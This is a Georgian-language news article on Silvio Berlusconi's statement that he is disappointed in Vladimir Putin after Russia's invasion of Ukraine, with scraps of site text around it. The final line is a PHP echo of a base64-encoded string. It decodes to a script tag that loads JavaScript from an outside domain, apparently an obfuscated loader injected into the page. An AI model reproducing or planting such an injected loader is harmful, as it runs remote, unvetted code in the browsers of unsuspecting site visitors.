celsiusi
ავერსი საქკაბელი
იტალიის ყოფილმა პრემიერ–მინისტრმა, Forza Italia-ს ლიდერმა სილვიო ბერლუსკონიმ, უკრაინაში რუსეთის შეჭრის დაწყების შემდეგ, პირველად გამოთქვა თავისი აზრი ვლადიმერ პუტინის შესახებ და აღნიშნა, რომ იმედგაცრუებულია რუსეთის პრეზიდენტის საქციელით. ამის შესახებ ინფორმაციას იტალიური მედია Rai News  ავრცელებს.
 
„არ შემიძლია და არ მინდა დავმალო ის ფაქტი, რომ ღრმად ვარ იმედგაცრუებული და დამწუხრებული ვლადიმერ პუტინის საქციელით. მან აიღო ძალიან სერიოზული პასუხისმგებლობა მთელი მსოფლიოს წინაშე. მე მას ოცი წლის წინ ვიცნობდი და ყოველთვის მეჩვენებოდა დემოკრატიისა და მშვიდობის ადამიანად", - განაცხადა ბერლუსკონმა. 
 
მისივე თქმით, Forza Italia-ს პოზიცია არის ის, რაც გამოიხატება ძალიან მკაცრ რეზოლუციაში უკრაინაში რუსეთის აგრესიის წინააღმდეგ.
 
„ჩვენ არ გვქონია ყოყმანი მხარი დაგვეჭირა 1 მარტს ევროპარლამენტის მიერ დამტკიცებულ რეზოლუციაზე, რომელსაც მე დარწმუნებით მივეცი ხმა“.– აღნიშნა მან.
 
ბერლუსკონის თქმით, ბუჩასა და უკრაინის სხვა ადგილებში მშვიდობიანი მოსახლეობის ხოცვა-ჟლეტის, რეალური ომის დანაშაულების ფონზე, რუსეთი ვერ უარყოფს თავის პასუხისმგებლობას.
 
„პირიქით, მან თავისი ინტერესებიდან გამომდინარე უნდა გამოავლინოს და გაასამართლოს ისინი, ვინც პასუხისმგებელნი არიან იმ ქცევებზე, რომლებსაც კანონი და მორალი ომის დროსაც კი მიუღებლად მიიჩნევს“.– განაცხადა ბერლუსკონმა. 
 
იტალიის ყოფილი პრემიერი თვლის, რომ იტალიამ უნდა იმუშაოს, უკრაინაში ომის სისასტიკის შეწყვეტისთვის. ამასთან, გარანტირებული უნდა იყოს უკრაინის თავისუფლება და ტერიტორიული მთლიანობა. 
 
ბერლუსკონი მიიჩნევს, რომ ცეცხლის შეწყვეტა რუსეთისთვის ფუნდამენტური ნაბიჯი  იქნება, მისი საერთაშორისო ურთიერთობების ნორმალურ მდგომარეობაში დასაბრუნებლად.
 
ცნობისთვის, სილვიო ბერლუსკონი წლების მანძილზე ვლადიმერ პუტინს მეგობრად მოიაზრებოდა. 
 
 
1057
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");